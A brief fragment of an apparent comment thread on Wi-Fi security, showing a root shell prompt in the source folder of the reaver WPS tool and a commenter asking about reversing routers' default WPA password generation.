    root@bt:~/reaver-wps-fork-t6x/src#

  38. Silve says:

    Have you got some experience with routers generating default WPA passwords, and reversing them?
